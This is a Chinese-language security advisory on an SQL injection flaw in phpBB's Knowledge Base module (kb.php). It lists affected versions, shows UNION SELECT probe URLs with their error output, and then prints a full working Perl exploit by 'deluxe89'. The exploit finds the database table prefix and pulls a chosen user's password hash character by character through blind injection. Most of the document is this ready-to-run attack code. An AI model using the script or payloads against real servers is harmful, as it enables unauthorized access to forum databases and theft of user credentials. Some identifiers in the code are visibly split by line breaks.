受影响系统:
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0
phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0
描述:
phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。
phpBB的Knowledge Base模块中存在SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。
起因是应用程序在SQL请求中使用用户输入之前没有正确的过滤输入。如果用户能够提供如下输入的话:
/kb.php?mode=cat&cat='
就可得到类似的错误消息:
Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
Match: DEBUG MODE - SQL-Error
成功利用该漏洞可能导致入侵应用程序,泄漏或修改数据等。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
use strict;
use IO::Socket::INET;
$| = 1;
print "
#########################
# phpBB KnowledgeBase Hack - Exploit
#
# Discovered by [R] and deluxe89
# Exploit by deluxe89
#########################
\n";
if($#ARGV < 2)
{
print "Usage: ./phpbb
_kb.pl host path userid [proxy:port]\n";
print "Example: ./phpbb
_kb.pl www.host.com /phpBB2/ 2 127.0.0.1:80\n";
exit;
}
my $debug = 0;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $prefix = '';
my ($addr, $port) = ($ARGV[3] ne '') ? split(/:/, $ARGV[3]) : ($host, 80);
if($ARGV[3] ne '')
{
print "[+] Using a proxy\n";
}
else
{
print "[+] You're using NO proxy!\n";
sleep(3);
}
#
# Get the table prefix
#
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
my $value = "mode=cat&cat='";
print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";
while(<$sock>)
{
if($
_ =~ m/FROM (\w+)kb
_categories/)
{
$prefix = $1;
print "[+] Table prefix: $prefix\n";
last;
}
}
if($prefix eq '')
{
die("[-] Getting the table prefix failed.\n");
}
#
# Getting the hash
#
print "[+] Getting the hash. Please wait some minutes..\nHash: ";
my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";
sub test
{
my ($i, $num, $g) = @
_;
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "mode=cat&cat=0+union+select+0,1,3,3,7,0+from+${prefix}users +where+user
_id=$userid+and+ascii(substring(user
_pa ssword,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num/*";
if($debug)
{
print "\t$value\n";
}
print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";
my $if = 0;
while(<$sock>)
{
if($
_ =~ m/DEBUG MODE/)
{
return 1;
}
}
return 0;
}
www.CLDE.net
